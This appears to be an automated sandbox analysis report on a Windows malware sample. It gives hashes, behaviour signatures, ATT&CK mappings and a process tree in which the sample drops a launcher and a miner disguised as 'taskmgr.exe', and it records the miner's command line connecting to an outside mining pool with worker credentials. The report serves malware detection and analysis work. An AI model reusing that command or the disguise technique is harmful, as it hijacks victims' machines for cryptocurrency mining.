951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0

Analysis

max time kernel
130s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
02-12-2022 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0.exe
Size

278KB
MD5

88ffa3cb2314bace3dfe19343b3c92e0
SHA1

23d2455ab08d3d62fec2c653181d815bb9df9c5a
SHA256

951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0
SHA512

f3d941e958dc029f8329687b61a5bef2101c276261cf079aed07718de3d4500e5af73676282a735e8c6006dfc7cf0f5bba1177fcaaf6e4737e2a7d4466b3737b
SSDEEP

6144:Lu2urzh9xu/XkauJzAH6ldxU5GtPqahp9WxyM8wvIbVBeyFAl:Lutrzh9xOXkFAmdxU5G59p/oIJBTAl

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4536	hstart.exe
4624	taskmgr.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 4536	2340	951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0.exe	83
PID 2340 wrote to memory of 4536	2340	951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0.exe	83
PID 2340 wrote to memory of 4536	2340	951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0.exe	83
PID 4536 wrote to memory of 856	4536	hstart.exe	84
PID 4536 wrote to memory of 856	4536	hstart.exe	84
PID 4536 wrote to memory of 856	4536	hstart.exe	84
PID 856 wrote to memory of 4624	856	cmd.exe	86
PID 856 wrote to memory of 4624	856	cmd.exe	86
PID 856 wrote to memory of 4624	856	cmd.exe	86

C:\Users\Admin\AppData\Local\Temp\951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0.exe
"C:\Users\Admin\AppData\Local\Temp\951512f772f2962a36a635d5bfbbd0aa499bdda196787c6011e901cfcea0d5a0.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Users\Admin\AppData\Local\Temp\hstart.exe
  "C:\Users\Admin\AppData\Local\Temp\hstart.exe" /NOCONSOLE test.bat
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c test.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:856
  - - C:\Users\Admin\AppData\Local\Temp\taskmgr.exe
      taskmgr.exe -a 5 -o http://btc.mobinil.biz:8332/ -u 17228475_001 -p 172283654 -t 2
      4⤵
      Executes dropped EXE
      PID:4624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hstart.exe

Filesize
43KB

MD5
c1c769d742f88e441ded76bf57a5a45c

SHA1
06872dabd41e70dc4ef8fd5131b334be8a17db3c

SHA256
3e857094c9d89b31676477ce7d8d523f94c767f3cb0769dae99af76b3c4e004b

SHA512
d35478590ab1abee0293589a8b8cc13307afb0a14d7bd01a35388114ace6cb007e0f132e5d90bc5ae90b3e36a3edef67354a94363415cf2a1d3ef5f4ae99636f

Download Submit
C:\Users\Admin\AppData\Local\Temp\hstart.exe

Filesize
43KB

MD5
c1c769d742f88e441ded76bf57a5a45c

SHA1
06872dabd41e70dc4ef8fd5131b334be8a17db3c

SHA256
3e857094c9d89b31676477ce7d8d523f94c767f3cb0769dae99af76b3c4e004b

SHA512
d35478590ab1abee0293589a8b8cc13307afb0a14d7bd01a35388114ace6cb007e0f132e5d90bc5ae90b3e36a3edef67354a94363415cf2a1d3ef5f4ae99636f

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskmgr.exe

Filesize
726KB

MD5
54e328364335553807a670eb3dd137b1

SHA1
bba0fa29f13c0cc4f20a165181cfae8668c32674

SHA256
9bae29593488e652f08e05882c0accd8159fd77fce3209119856287fda27abb6

SHA512
15b95a0714b4593656d7f81ab8f10c7466ec573f714f7a373da0763ca65235afa1309fa998ec2bd396791591295c7464234880c40487cb5eadef1a5b53cc647e

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskmgr.exe

Filesize
726KB

MD5
54e328364335553807a670eb3dd137b1

SHA1
bba0fa29f13c0cc4f20a165181cfae8668c32674

SHA256
9bae29593488e652f08e05882c0accd8159fd77fce3209119856287fda27abb6

SHA512
15b95a0714b4593656d7f81ab8f10c7466ec573f714f7a373da0763ca65235afa1309fa998ec2bd396791591295c7464234880c40487cb5eadef1a5b53cc647e

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.bat

Filesize
83B

MD5
86f9a58144d496963bbf38020306474d

SHA1
34e6fe0e37b3559aea91be19482bc82ef1b65a92

SHA256
f3d099512bffc2d419bdbcf3c0fc782a4c9148a07e1b602fa90520e53cfa771b

SHA512
5d33e972c7fa99389f877dbfda705a4629ce5fc1b531d50e10943d527cd3794124b842facb03e4f57d4f2ccf7cfe8b931f4f31ce9b1739cc1deff6384d7e2791

Download Submit